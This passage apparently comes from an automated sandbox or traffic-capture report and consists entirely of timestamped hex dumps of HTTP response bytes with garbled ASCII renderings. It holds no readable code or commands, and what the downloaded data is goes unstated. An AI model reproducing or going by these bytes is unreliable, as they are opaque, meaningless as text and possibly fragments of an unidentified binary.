                                  Data Ascii: sL:VVi i1P\7DSGLg+kT,eOH9ZM|o43&"JEZ{MSw[hXb%*%V~7hCV%yrQJ_+U-D+gZ}).j+qLRXvd7k)x}I?[TS^F]AO'
                                  2022-11-29 15:56:46 UTC3859INData Raw: ae 01 3d 47 8b 45 18 60 12 7f 0b f7 02 ed ec 79 71 ba 4f 10 cc f4 36 45 73 70 e2 e4 71 a4 20 c5 d1 05 57 aa 61 a3 86 33 b1 50 a4 6d b0 6c 18 02 cc ab b7 04 b6 52 9f b0 5d c0 69 cb 19 f8 db d8 63 6b 3e 04 e1 9f 98 0e a2 04 00 84 e0 17 a6 9f 55 14 5b 27 24 fb db 47 2c 8f 41 c8 9b 83 d7 32 0c a7 55 16 d7 60 77 d6 d7 da f7 3d ea 53 54 24 53 91 75 03 a7 54 c8 fd a5 0b 28 37 e1 a2 7b e4 ca d0 ce 8a 21 1c ef 7f b4 94 b6 09 42 43 2d d5 0e ce 0e d4 f9 77 fa 64 08 63 86 af 1a 21 5a a2 fe cc 76 d4 e5 68 31 de c0 52 8e 63 40 8f 7d c4 ca 7c 78 07 14 cb 60 cb 85 8d b9 bb ee a7 7c d3 07 94 6f da a4 73 59 f4 c8 f6 0d 3c b4 70 b0 7e c0 54 8e d7 74 bc f2 5b c9 62 d1 61 e5 d5 ee 31 e0 92 99 df b7 bf 92 8d 62 ef 19 05 1b e2 71 93 de 3a 75 40 99 63 1e 52 69 af 3d a5 9a 51 bd
                                  Data Ascii: =GE`yqO6Espq Wa3PmlR]ick>U['$G,A2U`w=ST$SuT(7{!BC-wdc!Zvh1Rc@}|x`|osY<p~Tt[ba1bq:u@cRi=Q
                                  2022-11-29 15:56:46 UTC3875INData Raw: d8 d9 d5 7e a3 85 29 a4 da 10 14 05 d5 fb c6 b1 38 ed 8e 85 bb 17 a0 b1 a7 b5 93 77 f0 70 25 e2 f3 c2 86 7f 21 5d c1 26 8e a3 7b 6d f5 9a ba e9 1b 52 ea d4 62 3d 9e c9 c3 38 d3 47 c4 6e f6 14 dd f9 f7 cf 8f 48 68 91 10 6d d2 dd 78 e3 e3 86 1b e8 08 d0 0f e7 99 46 fd 59 e7 a3 1f 6d a8 18 a9 47 c6 c0 e8 10 77 c4 e0 bc 6e 9b b4 12 c2 f2 aa 4d cb bc 2e e6 ae 6a a1 2b e1 8c 0f 3a eb b9 c4 b1 86 06 36 ea ea c1 fa b3 aa 55 81 88 3c 45 92 d1 4c d1 2d a7 64 37 99 e3 a1 e8 4a a9 7a 3f a7 0d be 5c b7 41 40 28 6c ac 4a 92 20 48 11 b0 36 b7 d3 cf 4c 30 63 48 fa d8 47 44 d2 60 9a 40 00 b2 1b fc c5 ef f2 5e 95 2d 90 e4 4e 57 6e 52 cf 91 22 59 2c c3 1c 64 70 16 85 73 ca ff 39 54 ed 6d 51 29 65 72 78 5d 2a c4 75 64 86 96 e1 40 c1 69 b8 82 03 97 a3 13 42 93 ce 0f 28 d0 3c
                                  Data Ascii: ~)8wp%!]&{mRb=8GnHhmxFYmGwnM.j+:6U<EL-d7Jz?\A@(lJ H6L0cHGD`@^-NWnR"Y,dps9TmQ)erx]*ud@iB(<
                                  2022-11-29 15:56:46 UTC3891INData Raw: d4 b5 aa 09 6d f5 c5 ca 42 b5 0b 80 6d 55 12 69 f7 bb dc 9c b2 1f 34 b4 04 bf ab 2b fe fb 7b 63 bf 5f 5e 41 c3 87 9d 86 98 48 a7 a9 b4 bc 57 4c 9f 9a b6 c2 d4 9b 8d 3b 23 2b 8f e5 87 5f 14 c6 68 d8 af 4a b3 e3 d0 b0 34 44 bb 50 03 44 8c 91 2c ba 29 1d 65 bb 45 ef dd 1c 54 4f 63 51 88 29 9e 6c 3b 25 88 43 05 14 4c de bd 49 cc ac 86 f2 fa f4 b8 05 5a 87 8f 6e ed 36 02 4f 5d 34 65 bb 49 bf b4 6c e5 55 e3 8d e6 86 69 d1 7e 5e 08 79 11 4e 2f 27 e2 25 f1 ac bd 20 34 d1 e0 b6 79 d3 00 aa 3d 8c 4e a1 a3 51 00 7c 5c c5 27 94 58 83 97 09 f6 24 c6 de 72 aa c1 74 78 5b 6f 37 ed cb 83 08 b0 2e 17 30 42 86 a8 ed 8a c9 52 dd a8 3f 74 ca 66 73 5e 8c 8b 3d 6e 07 93 46 6b 6c 6b ea a9 f0 07 7c 4b b1 a6 9f 33 b9 d2 9f a0 84 80 d7 8e 54 45 e0 54 f0 a6 9e 6b 30 b3 cf 7f da 22
                                  Data Ascii: mBmUi4+{c_^AHWL;#+_hJ4DPD,)eETOcQ)l;%CLIZn6O]4eIlUi~^yN/'% 4y=NQ|\'X$rtx[o7.0BR?tfs^=nFklk|K3TETk0"
                                  2022-11-29 15:56:46 UTC3907INData Raw: e0 9d 1b 1a b4 a1 e5 9d 22 82 fb f2 10 36 ac 6c 9b 93 cd 38 32 85 4c a9 91 60 de 2f 85 f0 b3 e8 43 7e da 3d 31 f6 62 bc 90 f5 81 31 ce 7b 79 a0 cb 19 ce e1 47 c6 fb e7 33 0f 8b ec 95 12 18 23 e0 72 15 66 cb 19 ec 59 b1 d4 c5 54 89 b4 89 dc 59 de c4 20 6a 25 fd 73 a2 a1 e4 57 eb 98 15 00 b5 0b 94 ae 12 20 85 3c 2e 1f d2 2f a8 e8 26 fc 25 a1 b0 f4 68 a7 41 c8 d3 ae 3c 1e f3 14 07 49 b3 87 74 a7 80 81 0c 26 7b 40 b9 62 55 86 8d 85 d1 a7 3f 52 3b 5c 54 01 46 56 86 19 6a 70 aa 3f 9d a9 a6 fc 79 d8 95 51 23 6b 5c 96 80 b2 81 e6 35 5d f5 b9 08 e2 6f d9 d5 1f 07 22 62 53 d8 0c cb 9c fc 78 c1 d1 a1 c6 2d 68 ed 7e 08 ba 71 06 f2 ef 1c 91 79 30 9c fe 15 51 b1 f2 03 12 28 52 5f 98 76 34 76 32 bb 18 bd 24 35 10 60 c5 6d e4 c0 b3 86 21 41 43 0d 1a 60 fb ba 57 ce 25 82
                                  Data Ascii: "6l82L`/C~=1b1{yG3#rfYTY j%sW <./&%hA<It&{@bU?R;\TFVjp?yQ#k\5]o"bSx-h~qy0Q(R_v4v2$5`m!AC`W%
                                  2022-11-29 15:56:46 UTC3923INData Raw: b5 0a d4 ec 85 47 e7 66 bf cb dd ee 55 58 ad 36 bb 15 b8 98 19 88 7a 4e 8e 09 4f 50 11 1a 41 9d 41 06 c0 1a 12 66 a0 dc ca 38 cc 95 9f f4 0a f2 9a 75 b4 72 c9 4c 58 29 36 5e 12 7e 48 4e 29 f0 f3 a1 69 e3 57 51 f2 1c 4f 47 6d d0 f2 8a 55 21 fd 47 de d9 bb fb cc 06 66 12 81 1e bf cd 60 fd 94 91 9f 5a 0a c4 22 69 d1 57 2e 82 4d aa 32 80 88 c9 26 ba 86 cb 44 b3 3d df 8a 9a 9a a1 bf 00 2d eb 81 41 22 8c ce 2a f5 d1 d6 64 a4 e9 e4 dd eb f1 73 59 2e 79 1f c1 d1 13 84 fd 49 74 ce eb 6a 68 92 0d f2 61 c2 4b bd 30 39 7f 3e 13 52 2c e0 8c 99 e8 71 a8 62 62 e5 40 84 35 ac 8a be 24 57 c6 cb 8e 82 75 19 b1 a5 2e 47 6d a7 03 b9 67 f1 69 bd 8b cc 56 5e fd dd 3e d2 25 67 29 4b e7 aa 38 d2 83 86 45 16 34 c5 7a ba 09 3a a1 ca 19 1d c2 32 e0 0e b1 75 89 e6 0c 72 12 53 a9 15
                                  Data Ascii: GfUX6zNOPAAf8urLX)6^~HN)iWQOGmU!Gf`Z"iW.M2&D=-A"*dsY.yItjhaK09>R,qbb@5$Wu.GmgiV^>%g)K8E4z:2urS
                                  2022-11-29 15:56:46 UTC3939INData Raw: 25 ca ad ed a5 9e b5 3e be 18 76 34 60 ae 9c 8a 0e 16 12 87 bd fd 0d c2 8c e1 5f 64 08 8a 53 f8 c8 05 c7 4a 94 a9 3c 35 7f 44 72 08 e0 f8 c9 2a d7 5c 95 91 37 74 8e f3 f7 59 72 e4 ac 81 b1 dd e8 b4 dc 74 19 a7 9f 5f 23 fa d7 54 9e 38 ca 65 10 53 e5 68 af e0 03 ed 0a 95 38 ce 03 ce 68 55 95 33 c7 d3 e2 4b e0 fa cd 88 b4 41 8a 8f 7b a1 7a e1 ce 47 e6 09 45 ee e0 c5 97 b8 87 15 a8 d5 8f 18 1a 6c 0d fe f9 7e 0a 99 46 29 a4 ad 8f 82 35 56 04 bb 45 ae bc 90 2a 1f 55 1a 48 23 be c5 26 33 99 d0 ff 51 c4 1b 6d 32 65 80 20 7e ba 3d 55 f7 32 2a 68 c4 87 d4 85 d9 6e 81 90 b7 d9 6e 6b 2e 47 37 eb e9 50 bd 94 be 88 1a 7c 25 98 6f 6b 39 7d 66 cd 1b b3 59 37 7a 9b 5d dd 85 52 f7 d1 20 b3 ed e2 0c 26 d6 80 ff 4a c5 95 86 ec eb 4a 50 08 35 80 d6 d7 d0 8a 65 50 3d 56 f0 f1
                                  Data Ascii: %>v4`_dSJ<5Dr*\7tYrt_#T8eSh8hU3KA{zGEl~F)5VE*UH#&3Qm2e ~=U2*hnnk.G7P|%ok9}fY7z]R &JJP5eP=V
                                  2022-11-29 15:56:46 UTC3955INData Raw: 69 f0 62 13 fe 7e 7d e4 eb 9f 79 0f b1 34 39 ea c4 16 36 0a cc ac 81 46 11 5a cd 04 28 9a 4f 46 64 78 ca df c9 42 70 b7 96 71 ae 97 f9 d2 c3 25 08 71 67 bb e5 c7 d7 25 96 0b c5 92 87 07 12 ac d7 9f d2 be f0 9c 87 05 fe 17 b0 1e 40 f0 a2 d8 87 c4 07 a7 07 cd 89 c0 ee 23 d9 60 e7 00 00 42 55 b0 9a bc e2 fc 8c 08 1a b5 f7 33 7c ca 51 91 41 38 ba 37 a8 c5 b9 d9 24 e4 b1 e7 6d 5a 28 aa 77 06 3c ed b0 e3 3b 79 94 b8 1b 3d 47 b1 c9 da f9 34 d9 3a a2 b2 3d 79 02 a3 77 4d 61 f2 a0 70 4b 03 42 81 3c 65 83 66 57 ae 44 98 28 73 7a 4b fd fc 2a e3 d4 4a 7e 7d 39 c7 33 23 f9 ea 46 d9 1b 55 00 c3 cf 05 10 0a 0e f9 04 07 c5 5b 14 ba 98 22 f5 13 fe 22 3a 6c 7e d1 fd 88 36 76 bd c3 a3 8a c4 ac 0d cf 17 74 b5 ff 2f 31 52 32 6d 7e f5 9c c1 4a 4c a0 81 a7 d7 ce ef 43 22 7d 81
                                  Data Ascii: ib~}y496FZ(OFdxBpq%qg%@#`BU3|QA87$mZ(w<;y=G4:=ywMapKB<efWD(szK*J~}93#FU["":l~6vt/1R2m~JLC"}
                                  2022-11-29 15:56:46 UTC3971INData Raw: 28 d3 2d fa a2 ba f0 76 ce 6e 4d 19 50 76 2e bd 12 9e cc f6 aa 5a 59 7f 8c b2 36 2f 08 18 af b4 14 b7 86 a9 95 15 09 02 0a 00 5a 8b 84 c1 bf 60 df 97 d7 f4 9a 75 5e 41 f1 38 ae 8b 5b b4 ae 10 f5 2d c2 31 96 3d ae f5 ca f0 20 91 69 0d a7 77 4d fc 3b 19 bd f0 3a b8 d1 bc 97 c8 3e c6 ca 57 a2 51 c6 0a 98 c7 30 5e e2 cb 29 63 50 1a 80 d1 b1 bb a7 51 77 39 aa 6f 63 b9 35 23 47 70 db f5 66 3d 45 76 97 6d d5 96 4b dc 47 f7 63 a1 64 99 0c c4 23 20 ea e2 6c fd 12 16 ea 5c 3d d0 4d 65 a2 b1 3d 4e 0c 70 2c 5c 54 90 74 d0 20 dc 99 20 c9 c9 e5 3e 30 db 47 59 f1 e2 5b 3b c0 70 69 ea 1a 49 4d db d3 ee de 2d 16 ae d3 08 c2 9c 35 ea df 31 a2 e3 f1 76 eb 64 c6 07 3f c8 96 54 73 b1 34 85 f8 7e 0d e8 13 26 2d e0 54 81 dd 8a 91 77 cb b9 68 fa 14 46 c8 79 8d b2 cd 08 49 8e 89
                                  Data Ascii: (-vnMPv.ZY6/Z`u^A8[-1= iwM;:>WQ0^)cPQw9oc5#Gpf=EvmKGcd# l\=Me=Np,\Tt >0GY[;piIM-51vd?Ts4~&-TwhFyI
                                  2022-11-29 15:56:46 UTC3987INData Raw: f4 0e 12 9b 62 f1 c9 69 1a 3f dc da 13 1e 2a 97 ff c1 42 39 2d 77 e8 ef db 56 29 d1 08 e9 f0 2d f2 2c 26 27 ed 03 60 d1 49 01 f0 80 0e 34 66 ca 4d f1 c9 72 92 92 af 23 65 39 50 a1 8a ee 73 1f 9d 42 30 d2 6f 4d 47 7c 3d 05 be 78 9e 44 57 1e 30 88 5a 0a 8e 15 0d 2c 3f 73 d5 9f 6b 4f f7 fb b0 f3 be 94 65 54 ba 8d ed 69 d7 7f a4 ca cc e2 65 d2 d7 c1 b0 a3 10 50 fb 6e 77 f6 af a0 74 99 6b 68 e5 5d f3 8c 66 84 97 65 8b fb 53 1c 67 b2 2f 09 06 80 fd 55 2f 1c 25 43 94 91 12 1e ff 05 29 48 32 a0 10 39 7c d8 87 b6 af 80 92 2f 36 6c 07 65 df 11 92 29 77 3f c4 99 be 1b 17 6d 64 c5 c8 70 8a b6 51 74 e3 e8 29 16 2b f4 79 5f 17 fe 9a 24 39 a6 81 32 1a f9 67 3c 2b a4 16 0b ae 16 9b 9f db 6f 58 05 eb 59 89 f4 cf 5f ce 23 12 b7 63 21 19 ce 08 06 32 ae af ca 34 03 59 3f 36
                                  Data Ascii: bi?*B9-wV)-,&'`I4fMr#e9PsB0oMG|=xDW0Z,?skOeTiePnwtkh]feSg/U/%C)H29|/6le)w?mdpQt)+y_$92g<+oXY_#c!24Y?6
                                  2022-11-29 15:56:46 UTC4003INData Raw: b3 d6 99 a4 af 74 0f a8 9c 0e ba cc e1 2e 11 b0 1a ce 40 57 94 32 6e dd 0d 2a 1b f4 c3 31 90 52 63 99 b4 7a d5 ac 94 e4 1c 03 66 1a bf 23 c0 3e 05 82 e1 4f 07 cb 0e 61 b7 13 32 c0 4a 5a 59 e9 8a c6 92 bb b2 ad ac 37 a0 d4 f0 60 21 99 5b e0 9c c6 f8 24 fa 6f 06 2b 18 88 43 15 62 78 1b c6 d1 8c f9 85 d4 99 fe 0d 30 ab fb 1c 48 4e 34 db 83 6c e9 be e8 f6 b0 8d 18 55 bc af 65 ed e2 8c 9a c3 8a 02 88 d3 f1 74 ee 3e 11 d7 ea 6b 2d 44 01 d1 43 80 e6 3d 1b 1f 29 d3 11 bc 62 25 66 0f f0 de eb ac c1 f2 dd b9 0a d8 77 5c fa f3 a2 5c c6 30 18 00 dd aa e1 b9 61 7a 3f 5f f4 88 98 7d 20 d2 ee dc b8 c9 18 af 5a a5 27 eb 32 d1 1c f1 95 5b 29 2f 89 c5 83 21 53 12 ef 5c 5f 0a 37 b4 ac 85 20 ff 0f 43 e4 18 7d 7b ab ef c8 43 87 5e 2d d0 db 53 36 22 0d 44 3c fe 21 0b 5d ad 3b
                                  Data Ascii: t.@W2n*1Rczf#>Oa2JZY7`![$o+Cbx0HN4lUet>k-DC=)b%fw\\0az?_} Z'2[)/!S\_7 C}{C^-S6"D<!];
                                  2022-11-29 15:56:46 UTC4019INData Raw: 22 16 cc 10 7c f5 a7 5e cf 36 c4 01 17 94 6f d5 13 e5 cc da 41 1d 4d f6 e2 a1 3c 1e ac 70 23 55 b5 63 4c 06 9a e6 d5 a8 29 5a cc df 7b 2b 3d aa 41 23 39 a3 ad 87 63 67 ca 1b 42 11 db aa a7 1a de ca dc 54 9d 55 b9 9a 68 f4 86 ac 74 1e 4c 47 2e f1 21 31 46 03 1d 91 f8 63 f6 51 7f 95 6e 02 15 6f c6 b4 44 02 1d f6 fc 77 27 8c be ab 0c b8 c0 d2 2c 81 14 1d b9 43 47 dc 0e 4b 86 76 b0 4a 1d de b4 33 25 25 dd fc 8b dd e2 3c 38 54 81 77 37 1c 33 85 9d e7 c2 6c 16 66 27 48 f9 dd 7b 04 80 6d 83 bf c6 98 9a 0f 2a 8b 3a 10 3b 77 30 a3 33 95 ea e7 43 0c ad 06 1a 22 df 1d 08 4e 12 ba 26 a1 98 e7 70 ef 23 bc 6d 87 77 b0 3d a4 14 e0 7c 6a c7 fc c6 0c ff f2 89 42 85 f1 29 9b ae 31 6f e0 14 21 a2 4b bb 4d 5a 27 9b f5 7b ee 30 0a c6 72 08 9b 0d 17 c1 f4 68 13 82 8f 8e d8 08
                                  Data Ascii: "|^6oAM<p#UcL)Z{+=A#9cgBTUhtLG.!1FcQnoDw',CGKvJ3%%<8Tw73lf'H{m*:;w03C"N&p#mw=|jB)1o!KMZ'{0rh
                                  2022-11-29 15:56:46 UTC4035INData Raw: 12 a1 5a 26 cb 93 8c e5 f2 47 e5 65 b2 a9 f2 ea 8d dd 06 b6 ef 6d cc f9 7d ee f4 b0 3b 62 24 fb cd 50 2b c4 75 06 bc 06 95 30 cd b8 5e 9c 23 68 42 46 58 6b e5 de 55 db 4a 7b 10 21 30 4c 67 a7 62 b1 19 7b 01 00 d9 55 13 cb 67 70 7b 30 4d 80 61 8c 76 b6 1f 33 60 53 c4 eb 94 5f 9c 40 db f7 d5 9d c2 39 75 f0 a5 13 3f 54 2b 51 62 ea aa 10 e8 a8 a7 40 67 8f 3b 03 9e 01 f4 4b 9d ae ae 25 ab 68 ad 8c 22 00 c3 62 4f 5b 60 54 2d 0f ae e8 5a 35 2b 19 96 dc 9d 70 f3 aa 4e 2b cf bc 53 a1 42 f3 ec fe 25 f0 c7 6a 2a 29 f3 66 98 68 a5 40 c1 18 d5 eb 02 0d 00 6a de c2 35 84 0f da 69 44 40 78 72 bd e0 21 52 51 78 b3 57 46 c2 13 1d b8 59 35 37 c7 d5 b2 06 19 fc 91 c0 df df 70 10 ab dc cc c1 25 90 48 6a 30 ec 54 27 55 cf 0e 78 0b e1 74 3a c5 49 f8 b6 25 8a 23 09 f4 ca 81 d4
                                  Data Ascii: Z&Gem};b$P+u0^#hBFXkUJ{!0Lgb{Ugp{0Mav3`S_@9u?T+Qb@g;K%h"bO[`T-Z5+pN+SB%j*)fh@j5iD@xr!RQxWFY57p%Hj0T'Uxt:I%#
                                  2022-11-29 15:56:46 UTC4051INData Raw: 3a 5a fd 1e 43 3f 9c 92 bc 95 64 a3 09 24 55 b2 00 13 dc 7b 18 99 13 8a 9b 38 80 80 a8 49 20 70 1e b5 ef d9 aa 88 69 21 3f 68 a7 52 5d 30 fb 31 39 c5 57 99 58 65 09 42 db 3b 74 a5 d6 4f b7 e5 0e 12 3a 02 f6 5e c1 9b 86 9c 42 e3 bb d4 fc 01 ab 28 3f 33 57 f3 24 1a 2c d4 df 23 02 85 58 b0 38 a3 30 5f bb c1 c8 30 70 f2 8b cd 98 63 4a 13 cd f2 02 7f c7 ff a7 0b 97 77 44 39 8e 97 0a db b5 96 e3 8e 22 4c 71 61 93 c9 08 2e 39 c9 42 6e af 6b 53 87 89 9c d8 bf eb 76 4b ba 51 d8 59 64 ec e2 cd 15 aa 2a 92 1a 4c 9e 66 a4 8a f6 62 4d 2c e9 e2 2d 1c ec 20 5d 80 0c af 85 8a e2 83 79 91 04 8e 32 b2 f5 df 04 6d 34 b0 cd 7a 05 78 dd 47 fb 46 14 36 7a e0 a9 2d 34 5b cf 46 53 cc af 4b 47 88 a6 9c aa 0a 8d 7c 74 93 f1 66 94 ac 4b f8 a9 cc b3 52 0f c7 fa df 83 7a bf e7 6b 6f
                                  Data Ascii: :ZC?d$U{8I pi!?hR]019WXeB;tO:^B(?3W$,#X80_0pcJwD9"Lqa.9BnkSvKQYd*LfbM,- ]y2m4zxGF6z-4[FSKG|tfKRzko
                                  2022-11-29 15:56:46 UTC4067INData Raw: 01 a5 7e c3 c4 f7 aa d6 f6 32 f7 c4 df 22 2c a8 8f 82 99 16 48 fd f0 61 64 00 11 a9 d7 d2 f0 b4 31 96 7c ff 43 c7 45 a8 5e 57 a9 4a 23 f4 90 eb f6 42 61 52 9f 08 91 30 72 a2 39 1f 49 6c f2 3e 83 5a 7d 43 25 0c d7 d9 22 7a 68 82 b8 28 a1 10 86 36 9a 65 ad 02 a1 cc 1f f4 e1 a3 61 73 33 a9 9e 25 bc 94 0c 71 17 30 9b 2f 17 22 12 75 31 81 8d 00 1c 42 84 d8 5e bb 12 93 a7 3d 1c f4 1a 83 91 f8 cb 02 22 bc fa bb 04 aa 3d 73 41 ae 79 8b 3b f8 ab fd eb 26 1f 76 ae 28 59 84 c2 b5 e6 b9 58 3b eb 96 66 4c 6f 71 80 97 49 7e d2 cf a7 4f 64 40 27 45 41 95 41 66 cd a7 66 90 79 22 6d 45 1e 79 1d 3b 67 86 3d 6b e5 cf b4 9f 47 71 33 cf 5c a2 c1 8a 15 66 de 5a 92 a7 70 ec 6e 08 8c df 00 98 cc c2 98 35 0b aa 85 5a b2 ac 25 d6 ab 0d e9 92 7e ba 6a 50 08 29 50 fa 29 14 3e f4 f7
                                  Data Ascii: ~2",Had1|CE^WJ#BaR0r9Il>Z}C%"zh(6eas3%q0/"u1B^="=sAy;&v(YX;fLoqI~Od@'EAAffy"mEy;g=kGq3\fZpn5Z%~jP)P)>
                                  2022-11-29 15:56:46 UTC4083INData Raw: 11 b1 0a 46 b6 db f7 c8 9d 84 4d 42 a8 46 f9 66 54 6a db e0 d3 a0 55 78 e8 c4 81 23 d8 af d0 31 35 d6 72 92 43 97 05 2f 27 4e 7e 35 12 03 b3 9b 69 e2 7a d1 1b 80 ad 58 4e 23 81 45 52 5a f3 c5 0b 19 db da d4 e7 9b 1e 9c 98 41 bb 50 e3 cf b1 fd 2a 4f ae 7d 2e f7 3c 14 8a 70 10 e9 aa a0 d3 68 75 8f b0 8c e5 51 16 a4 2e 1c f0 b8 52 30 96 6a 7f f2 e2 0a 45 52 77 7f 8c d5 61 9a 0d 78 3f 39 dc e7 be f6 18 d7 1b 86 8e fd 7e 87 61 c9 a8 10 22 e2 5a 63 31 57 76 64 58 76 5c c2 29 51 8e ba bf da e6 d0 6b 11 fc 70 9c ae 92 60 4b 2c 3d df 18 99 37 f6 65 eb 16 d9 17 24 82 03 5d 16 c2 5c 4b 9c 2c 27 23 63 8d d4 09 40 fa 26 aa a3 19 ca b0 0f 80 4f 29 12 62 2c 81 36 af 6a 0d 75 c0 d0 86 c9 56 d9 ee 85 34 21 24 27 58 15 9d 52 54 eb 47 59 2a 58 d1 32 d7 c2 c3 26 13 52 6e 61
                                  Data Ascii: FMBFfTjUx#15rC/'N~5izXN#ERZAP*O}.<phuQ.R0jERwax?9~a"Zc1WvdXv\)Qkp`K,=7e$]\K,'#c@&O)b,6juV4!$'XRTGY*X2&Rna
                                  2022-11-29 15:56:46 UTC4099INData Raw: af 9c 3a 95 02 c5 e5 dc 62 be 5c 6b 19 df 66 c3 13 50 88 5a 5a b8 64 86 57 be 88 54 77 6b 21 dd f0 95 b3 b1 61 d7 1f 26 07 85 dd 1f e7 83 ea 72 ab 3d 76 0d f9 af c5 72 2e 2d 52 2b bf 14 86 6d 73 49 d1 ff 3a c9 f0 19 bc 16 5d fa 20 7d 02 e5 2f 70 25 bc 1e 06 b5 77 89 01 9b 28 d5 2c 55 af 6e f8 b2 83 e5 a7 7b 7d 88 ad d7 e8 2a 5a e1 76 bb 16 fc 1a 47 55 8a b1 75 02 50 3d 48 52 94 ab 89 21 1b d1 01 ce 47 6f 53 fb b6 54 9b 80 f0 b2 10 73 71 cf a8 b5 d2 d2 ff cd d9 09 aa 35 bc 7a 6b 36 65 9d 4c 56 32 fb b3 ec 0a 59 e8 02 91 26 4f 27 0b ee 9f 11 d0 82 f0 14 4f 76 d6 ac 4b a4 8b ad b5 08 57 4c c1 15 e0 71 92 80 68 10 12 95 bc aa 04 cb a3 28 67 3d 50 3a d5 de 08 1e 52 ba 78 fb 77 11 b0 1f f4 d9 01 b4 b0 12 97 d9 81 e4 da 3b c4 96 aa 2a 72 76 85 a5 8e d3 9d d6 2d
                                  Data Ascii: :b\kfPZZdWTwk!a&r=vr.-R+msI:] }/p%w(,Un{}*ZvGUuP=HR!GoSTsq5zk6eLV2Y&O'OvKWLqh(g=P:Rxw;*rv-
                                  2022-11-29 15:56:46 UTC4115INData Raw: b2 de 3a 73 fe 8c ef 68 02 de 80 f0 3b 02 be 4e 39 03 ea 84 bc aa 0d f2 33 b2 83 32 8b 00 9d 3b 32 19 9a 87 83 33 66 27 86 e0 94 4e 8f 0e 2f b8 e3 52 7c bd 35 66 f1 6a e0 5b c9 ca e6 04 89 87 33 a3 05 39 de 74 b9 f5 09 67 6f ca 6b 3c 30 c3 9c 04 d3 52 3d cb 87 b3 b5 e2 10 aa ac 07 f4 8b ac a1 ae 9f 50 39 1f 44 bc dd 3f b0 8f 01 70 a1 4c 40 ca 88 d0 0a 04 51 74 b3 47 a1 fb 18 15 10 51 ff d1 c1 a7 f7 e3 2c 5b 9c 4c 24 ac e5 f9 d3 4c cb 24 74 03 86 a3 f9 72 c4 2d 10 4e ef 67 39 bf 03 6f 54 52 49 39 d1 e9 ed fa e6 ef 17 be c4 99 a8 00 07 de 41 64 6d 8b 15 5b 9a 99 94 9a cf 04 7a 2d ac 5b 72 f6 4d 0e de 69 ab 2e 80 46 1c 8d 62 75 9b 0e 59 03 0d c8 1d 28 44 16 43 2e 64 20 c2 8f 3a fc ad 4f 12 d3 3c 14 f7 1a e1 48 e1 5d e8 97 ee e2 9a c1 1b 6d b5 f2 fe 77 00 3e
                                  Data Ascii: :sh;N932;23f'N/R|5fj[39tgok<0R=P9D?pL@QtGQ,[L$L$tr-Ng9oTRI9Adm[z-[rMi.FbuY(DC.d :O<H]mw>
                                  2022-11-29 15:56:46 UTC4131INData Raw: ee 0f ca 65 84 66 a1 e5 e6 24 1b 4a a8 41 5a 58 dd e5 d6 9d 72 d9 24 69 7c fd 24 c9 5e f0 4b a8 22 c1 fe e8 d0 3b 7b 7d d1 26 72 38 86 2b 79 70 7f 8c bf 6d 00 20 cf 9e 56 08 f6 f4 57 73 d6 a2 65 44 68 56 ad a8 5c c0 24 04 38 a9 0d 94 8e 98 8b 00 0c 9c 5f 69 aa ae 44 5f 39 b3 6a 62 a7 61 7b 50 13 7c af 3a 04 60 0e 65 a8 c2 27 09 0d 07 a9 e7 67 41 70 95 e3 5e 39 bd 55 38 04 87 78 3e b7 eb 0f 1d 81 d7 7a 13 d3 7b bf 2f e6 0e 87 23 d4 c9 ef d2 2e 37 d6 09 45 4b 14 92 e4 a4 07 c6 28 5a 72 ba 86 ba 44 cf 20 0a b0 b6 9a ea c0 d9 42 a9 b7 65 5f cf 24 98 e3 2f 56 af 22 d9 a2 0d 51 ad 4d 43 a6 7a 07 b8 21 3d 8a ff 31 da d4 27 e8 1e 70 03 90 fd 02 8a 88 ec 6c 30 26 04 3c b2 f7 9b 17 fc 67 92 80 63 07 78 a6 41 80 a8 eb 25 23 e2 7c aa 0c fe 51 cb 7d eb 2e de c7 22 29
                                  Data Ascii: ef$JAZXr$i|$^K";{}&r8+ypm VWseDhV\$8_iD_9jba{P|:`e'gAp^9U8x>z{/#.7EK(ZrD Be_$/V"QMCz!=1'pl0&<gcxA%#|Q}.")
                                  2022-11-29 15:56:46 UTC4147INData Raw: 32 9d d8 c9 9f 84 5f 39 54 84 1a a1 76 c2 aa 7d 2f cb 08 26 54 0a 35 22 6a e0 b0 6f 46 a3 88 bb 04 b0 50 3e 20 c2 66 b5 4a 95 95 62 63 96 59 db 5d ee 8b 7b 88 39 84 6d 04 42 05 e9 f3 2e 46 23 60 f2 0e 40 db d0 15 0b d7 9d 52 59 6e 86 0f 41 a5 16 ae bf 82 f5 69 e0 b0 8a f8 dd d1 48 3b 99 85 76 23 c0 da 3d 55 c3 8d c8 9a df 4c b0 82 2b 4d 4a c9 49 8f 36 5a 77 f4 c1 46 6e 36 bf 0c 75 43 4c d2 31 aa 41 a2 02 07 0e e2 18 7d 6e 75 eb 10 aa 31 fb a4 0b fe 79 ab a4 51 67 0d 5f 09 3b e5 71 6b 1a ea 7e 08 c7 91 d3 2b 31 b9 22 48 52 f2 0d 1d ae 8b d8 46 59 6b ca 1a 9a d2 b5 8b 7b 5b d2 07 cf 90 44 4a 25 69 ad 27 ba 3c ec f1 99 95 91 e0 fb 85 a7 e9 f7 9a 58 6d f0 e0 61 f8 0b 25 c3 c2 18 8f cd cb a8 a3 86 c1 02 35 c8 96 69 9e da fe 11 13 b1 c7 e1 d0 4b 08 e4 89 72 27
                                  Data Ascii: 2_9Tv}/&T5"joFP> fJbcY]{9mB.F#`@RYnAiH;v#=UL+MJI6ZwFn6uCL1A}nu1yQg_;qk~+1"HRFYk{[DJ%i'<Xma%5iKr'
                                  2022-11-29 15:56:46 UTC4163INData Raw: 23 cf 3c c4 63 6f 66 2d eb 80 56 a0 82 e8 38 9c f8 e2 da a2 cd 94 59 5b bd 64 29 2f 38 ec 70 ae c8 13 5d f9 d8 af 1a d8 7d 9b ac f1 09 bc c1 52 94 85 29 3f 98 72 68 40 4f 59 96 6e f4 1d c9 ee e8 c9 4a a2 ff 95 15 f4 2b 7d ae 4f c5 d7 fc fa 9f 2d 2c 7f 6f c6 f0 3e e1 dc 32 bc 9c 31 f5 3a d7 e1 13 59 5e af 0b c7 f5 32 2c 05 5b 11 1f b7 38 a9 14 96 62 0e 8d 7e 5c 99 b8 06 3b 35 c0 cd 2b 88 2a ad 0d 05 12 03 02 5a 80 1a 1f 8a 60 61 0c ed 08 99 1c 39 6b 70 67 63 3c d7 21 10 ae a7 90 08 fd be c3 8a 68 d8 a2 4d b7 b7 5d d9 c9 75 36 5b 20 c1 be 56 2e 1f 83 d5 d7 5e 4e 6e 48 16 8e 52 68 a6 86 80 28 4c e8 c2 3e 5a 0d 8d 3c 38 77 d8 8f ca 6d 8f 